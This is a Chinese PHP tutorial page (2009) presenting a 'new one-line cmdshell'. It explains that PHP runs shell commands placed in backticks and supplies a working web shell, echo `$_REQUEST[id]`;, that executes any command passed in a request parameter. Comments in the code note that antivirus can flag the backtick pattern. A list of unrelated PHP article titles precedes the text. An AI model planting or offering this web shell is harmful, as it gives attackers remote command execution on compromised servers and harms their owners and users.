当前位置: 首页 > 图文教程 > 网络编程 > PHP > php一句话cmdshell新型 (非一句话木马)

PHP
PHP中在数据库中保存Checkbox数据(1)
VFP与其他应用程序的集成
用PHP生成自己的LOG文件
用PHP实现文件上传二法
第七节 类的静态成员 [7]
第十三节 对象串行化 [13]
用 php 编写的日历
php+dbfile开发小型留言本
第十四节 命名空间 [14]
第十二节 类的自动加载 [12]
第十一节 重载 [11]
PHP4之真OO
在apache下限制每个虚拟主机的并发数!!!!
跟我学小偷程序之成功偷取首页(第三天)
在PHP中使用XML
使用PHP模拟HTTP认证
一个阿拉伯数字转中文数字的函数
通过对php一些服务器端特性的配置加强php的安全
在Zeus Web Server中安装PHP语言支持
PHP中实现图片的锐化

PHP 中的 php一句话cmdshell新型 (非一句话木马)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 200 ::
收藏到网摘: n/a

php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
复制代码 代码如下:

<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>